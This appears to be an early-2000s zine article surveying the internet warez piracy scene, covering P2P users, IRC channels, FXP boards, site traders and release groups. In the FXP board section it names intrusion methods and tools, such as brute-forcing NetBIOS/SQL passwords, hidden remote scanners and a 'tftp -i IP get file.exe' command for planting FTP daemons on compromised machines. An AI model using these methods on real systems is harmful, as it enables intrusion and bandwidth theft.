A Guide to Internet Piracy
by b-bstf (charmss5@hotmail.com
I've written this article after reading a few letter which show that some readers seem to know little about piracy on the Internet. I don't know everything about piracy on the net, but I would go so far to say that I know a fair bit about it.
First off, piracy isn't just a few guys who work at cinemas and software stores taking the odd film or game home and sharing it on their home FTP servers or Kazaa.
Piracy on the Internet, or "the warez scene" (as those into it like to call it) is surprisingly organized. Pirated software/games/movies/anything are called warez and will referred to as that from now on.
The Piracy "Food Chain"
Warez/Release Groups: People who release the warez to the warez community. Often linked with Site Traders.
Site Traders: People who trade the releases from the above groups on fast servers.
FXP Boards: Script kiddies who scan/hack/fill vulnerable computers with warez.
IRC Kiddies: Users of Internet Relay Chat (IRC) who download from "XDCC Bots" or "Fserves."
Kazaa Kiddies: Users of Kazaa and other P2P (peer-to-peer) programs.
We'll start at the bottom.
Kazaa Kiddies
At the bottom of the piracy food chain we have the Kazaa Kiddies.
There appear to be two groups of these Kazaa Kiddies. First, the 13-year-old kids with broadband downloading the odd MP3 here and there because they can't afford outrageously overpriced CDs from stores.
Harmless kids, costing no one any real money, pursuing their musical interest. Also, these are the people being labeled "pirates." These are the ones "Killing the music industry." These are the ones who are being sued by the RIAA for thousands of dollars. Sigh...
Second are the older, P2P veterans who use other P2P networks (Gnutella, BitTorrent, eMule) and programs as well as Kazaa. In addition to using P2P for music the may also download games, programs, movies, etc.
IRC Kiddies
Not far up from Kazaa Kiddies we have the people who go to IRC for their warez fix.
These folks can be more knowledgeable about computers and the Internet but tend to be just as irritating as the Kazaa Kiddies. Warez channels are often run by people who have access to a fair amount of pirated material (more about them later). There are generally two types of these warez channels:
Fserve Channels: These can often be run by the same Kazaa or IRC Kiddies. They don't really have a reason to run them; they just like to feel important. They mainly use the mIRC client's File Server function and some "133t skript" to share their warez direct from their hard drives.
XDCC Channels: These are usually run by people into FXP Boards and site-trading. They have access to fast, new warez. They "employ" people to "hack" into computers with fast Internet connections and install XDCC clients (usually iroffer - project.iroffer.net) which are used to share out pirated goods. From what I've seen, the people running these channels must primarily do it because they like to have power over a lot of people (being a chan op), but also they will often be given free shell accounts to run BNCs, Eggdrops, etc. by shell companies in exchange for an advert in the topic of the channel.
IRC Kiddies can be found on EFnet (irc.efnet.net) or Rizon (irc.rizon.net). Other servers and channels can be found through www.packetnews.org.
FXP Boards
FXP is the File Exchange Protocol. It isn't an actual protocol, just a method of transfer making use of a vulnerability in FTP.
It allows the transfer of files between two FTP servers. Rather than client-to-server, the transfer becomes server-to-server. FXP usually allows faster transfer speeds, although it is generally not enabled on commercial servers as it is also a vulnerability known as the "FTP bounce attack."
The Boards: FXP Boards usually run vBulletin (from software from www.vbulletin.org) and its members consist of scanners, hackers, and fillers. There are also usually a few odd members such as graphics people or administrators, but they don't do much.
The Scanner: The Scanner's job is to scan IP ranges where fast Internet connection are known to lie (usually university, etc.) for computers with remote-root vulnerabilities. We're talking brute forcing MS SQL and NetBIOS passwords, scanning for servers with the Microsoft IIS Unicode bug (yes, that three-year-old one). Oh yes, FXP Boards are where the lowest of the low script kiddies lurk. The Scanner will often use already "hacked" computers for his scanning (known as scanstro's), using "remote scan" programs such as SQLHF, X-Scan, fscan, and HScan along with a nice programs to hide them (hiderun.exe) from the user of the computer. Once the Scanner has gotten his results, he'll run off to his FXP Board and post it. This is where the "Hacker" comes into play.
The "Hacker"/Script Kiddie/dot-slash Kiddie: Now I think it's fairly obvious what the "Hackers" do. (They actually call themselves hackers!) Yes, they break into computers. Their OS of choice (for breaking into) is usually Windows. There are many easy to exploit vulnerabilities and *NIX scares these people. The Hacker's job is to run his application and "root" the scanned server. The program he uses (of course) depends upon the vulnerability the Scanner has scanned for. For example, if it's NetBIOS password he will often either use PsExec (www.sysinternals.com) or Dameware NT Utilities. There are various other vulnerabilities and programs used - too many to list here. Once he has "rooted" the computer (this usually means getting a remote shell with admin rights), he will use a technique known as "the TFTP method" or "the ECHO methods" (tftp -i IP get file.exe) to upload and install an FTP server daemon (this is almost always Serv-U) on his target. (In the case of the IRC Kiddies this would also be iroffer.) Once the FTP daemon is installed and working he'll post the "admin" logins to the FTP server on his FXP Board. Depending on the speed of the compromised computer's (or "pubstro"/"stro") Internet connection and the hard drive space, it will be "taken" either by a Filler or a Scanner.
The Filler: Now if the "pubstro" is fast enough and has enough hard drive space, it's the Filler's job to get to work filling it with the latest warez (the Filler usually has another source for his warez such as Site Trading). Once he's done FXPing his warez, the Filler goes back to the board and posts "leech logins" (read only logins) for one and all to use. What a great community!
FXP Boards are mostly full of script kiddies and people with too much time on their hands. They like to think the FBI are after them and get very paranoid, but in reality no one really gives a damn what they're up to except the unlucky sysops who get all their bandwidth eaten up because they forgot to patch a three year-old vulnerability.
The true "n00b" FXP Boards can be found on Wondernet (irc.wondernet.nu) so, if you like, go sign up on one and see what it's all about.
Tip: Pretend to be female. This will almost guarantee you a place on a board. Say you can scan/hack DCOM, NetBIOS, SQL, Apache, and have a 10 MBit .eu 0-hour source.
Site Trading
Next on the list and pretty much at the top or near the top (as far as I've seen) are the Site Traders. These are generally just people with too much time on their hands who have possibly worked their way up through FXP Boards. Site Trading is basically trading of pirated material between sites.
The Sites: These sites have very fast Internet connections (10 Mbit is considered the minimum, 100 Mbit good, and anything higher pretty damn good) and huge hard disk drives (200 GB would probably be the minimum). These sites are often hosted at schools, universities, people's work, and in Sweden (10 Mbit lines are damn cheap in .se).
These sites are referred to as being "legit." This means that the owner of the computer knows that they are there and being run. Fast connections mean a lot to some people. If you have access to a 100 Mbit line (and are wiling to run a warez server there), there are people who would quite happily pay for and have a computer shipped to you just for hosting a site that they will make absolutely no profit from (you can meet them on EFnet).
Unfortunately, this is where credit card fraud can come into Site Trading. This is frowned upon by pretty much everyone (there is already enough paranoia and risk in Site Trading) but some people do use stolen credit card information to buy hard drives and such. To be fair, Site Traders aren't a bad bunch - the majority don't even believe in making any money out of it and insist they are just doing it for fun. Anyways, back to the sites.
glFTPd is considered to be the FTP daemon to use (in fact, a lot of Site Traders and warez groups will not join a site unless it is running glFTPd). This also means that *NIX is the OS of choice (as there is no glFTPd win port). As well as running FTP daemon, the sites run an Eggdrop bot with various scripts installed. The bot will make an announcement on an IRC channel a directory is made or upload completed. It will also give race information.
The People: There are basically two ranks in Site Trading: "SiteOps" and "Racers." SiteOps, as you will have guessed are the administrators. There are usually between two and five SiteOps. One is often the supplier of the site, another the person who found the supplier and guided them through the installation of the FTP daemon. The other will be friends and people involved in the warez scene. One or more of the SiteOps will be the "nuker." IT is his job to "nuke" any releases that are old or fake (more about releases shortly).
Racers are the folks who will "race" releases between sites. Usually they will have access to a number of sites and will FXP release as soon as they're released. FXPing a release will gain credits. The ratio is usually 1:3, so FXPing 100 MB will get them 300 MB credits on the site, allowing them to FXP 300 MB of data from that site, which will gain them 900 MB where they FXP that, etc., etc. "Racing" of releases occurs when two or more racers are uploading the same file. The "race" is to upload the most of the release at the fastest speed. Racing happens shortly after a release is... released.
Warez/Release Groups/"grps"
These are the ones basically supplying everyone with the warez.
These are the ones the MPAA and RIAA don't seem to be too worried about, or at least aren't making a big public fuss about. However, these groups are known to the FBI and they know that the FBI and whatever other authorities are watching them and collecting evidence. They know that one day these authorities will strike as they have done in the past.
A lot of these people are just hoping that they won't be caught when it happens. As a result of this, anyone "high up" is extremely paranoid. Most users will use multiple BNCs (BouNCer, an IRC proxy) before even going near an IRC network. A lot of large groups will own their own IRC networks and SSL is used at every opportunity (FTP, IRC, etc.) It's hard to understand why these people actually do it when there is such a risk. The main reasons are, in my opinion, boredom. At the end of the day, if you're sitting in front of your computer for most of your life you may as well be doing something other than flaming AOL'ers on IRC, and this sort of thing keeps you busy.
Another reason is geekiness. Knowing that you were one of the first people on the Internet to see that film, or that's because of you that thousands of people are now playing that leaked Halflife 2 alpha and there are news articles everywhere about this "anonymous leaker" - it feels good, in a geeky kind of way.
A lot of these people (not all, not all) may have rather uneventful lives and to know that, although at school, college, or work they're considered a loser, they can go home at night and be looked upon as some kind of god within their group of online friends would feel good.
I do not believe that profit is a factor. These groups insist that they don't do this soft of thing for money, and I believe them.
There's a quote from a DEViANCE NFO file:
We do this just for FUN. We are against any profit or commercialization of piracy. We do not spread any release, others do that. In fact, we BUY all our games with our own hard earned and worked for efforts. Which is from our own real life non-scene jobs. As we love game originals. Nothing beats a quality original. "If you like this game, BUY it. We did!"
A quote from Team Razor NFO file:
SUPPORT THE COMPANIES THAT PRODUCE QUALITY SOFTWARE! IF YOU ENJOYED THIS PRODUCT, BUY IT! SOFTWARE AUTHORS DESERVE SUPPORT!!
Releases
A release is a piece of pirated material packaged and released by a warez group.
The format of the release varies, but in the case of games or programs the release is usually in bin/cue, compressed with RAR, and split into 15,000,000 byte files. The naming of the release will usually by something along the lines of: New.Game.3-ReLEASEGROUP
The types of releases vary. In games there are mainly either CD Images (bin/cue format) or Rips. Movies are either DivX/Xvid (two or three bin/cue files). There are many different types of movie releases. A great list of these can be found at www.vcdquality.com. Releases will almost always be accompanied by a .NFO file. This will provide information about the release and the group.
Additional Info
The following information is not from first hand experience, like the past information has been. This has been obtained from text files, told to me by people, and assumed. It will be mostly accurate, but there may well be errors.
The main members of any release group are:
The Supplier: This is the guy working at the local cinema or games store, the guy with the digital camera happy to sneak into the cinema , etc. Generally these people have to have access to new material, usually before anyone else gets to it. Often they will also have to have a fairly decent upload speed.
The Cracker: (Only in games/apps groups) This will vary between groups. For example, a VCD/SVCD group would not require a cracker. But the cracker plays an important role. He will have to crack the game's protection that stops the game from being played without the official CD. This guy usually has a fair bit of programming experience and can be quite smart.
Site Supplier: Similar to Site Trading, however warez groups are often more picky about the sites they choose. The minimum speed is usually 100 Mbit and often groups will only accept site that are being supplied by the actual System Ops/Admins themselves.
Courier: This guy's role is basically Site Trading. He has to distribute the group's release to other sites.
Terms you may have hard and their meanings:
PRE/PRE'd: When a release is released announcements will be made across many IRC channels called "PRE Chans." This is called the "PRE Time" and is the official time of release. PRE Time is used mainly in site trading.
0*: This is reference to how new the release is.
0-sec: This is a dream - n00b IRC channels often use this term, but they are lying.
0-hour: Mean the release was PRE'd under an hour ago.
0-day: Mean the release was PRE'd under a day ago. (Typo-error in article, was "an hour ago".)
And so on...
Nuked: If a release is Nuked, the uploader of the release will lose credits on the site he is Nuked on. A release is Nuked when it is breaking site rules (like eight hours of PRE or earlier).
Pubstro/Stro: This is a computer that has been compromised and has an FTP daemon running on it. It will be used to share warez, mainly to the FXP community.
ScanStro: Similar to the above, but is used to scan for other vulnerable computers.
Pub/Pubbing: Pubs are dead. These are from the old days when many university and business FTP servers had write access enabled on anonymous accounts. So instead of breaking into a computer, the warez kiddies would just upload their warez and give the IP address to their friends. This was very popular, but died out for obvious reasons.
Tagging: Once found a Pub would be "tagged" (a directory of empty file with the name tagged.by.lamepubkiddie or something similar would be made). The idea was that if a Pub war already "tagged" other Pubbers would leave it alone. This apparently worked for a while, with people respecting other people's tags and leaving the Pubs alone. But it certainly hasn't worked for a very long time.
Dir Locking: This war used in Pubbing to stop people other that your warez group finding and downloading your warez (and slowing the server down). You would hide it, using directory names such as com1 and ... These directory names would also be hard to delete or even open, so it could take some time before the warez were found by the server admin.
Raping: The act of Raping a FTP server is when someone downloads pretty much everything then can from it at a very fast speed. It's frowned upon.
Leeching: Downloading a lot without uploading.
PubStealing/Rehacking: Back "in the day" this would have been referring to as uploading to an already tagged Pub. Now it means replacing someone else's Serv-U with yours. PubStealing is frowned upon and people will often be banned from FXP Boards if they are found to be doing it.
Securing: The act of Securing a pubstro would involve deleting key files such as ftp.exe, tftp.exe, cmd.exe, etc. or changing the username/password. Securing methods depend upon the vulnerability.
Some warez related links:
www.nforce.nl - A site that archive .NFOs and releases. This site is frowned upon by people in "the scene."
www.isonews.com - A site seized by the federal government.
www.vcdquality.com - For movies specifically.
www.fxp.nl - FXP stuff.
www.jtpfxp.net - Rather large archive of FXP/script kiddie tutorials.
www.packetnews.org - XDCC search engine.
www.downhillbattle.org - Not related, but fuck the RIAA!
If I've mentioned a program and not give a link it's because it can be easily found through Google.
That's all. I hope this has give someone a better view of piracy.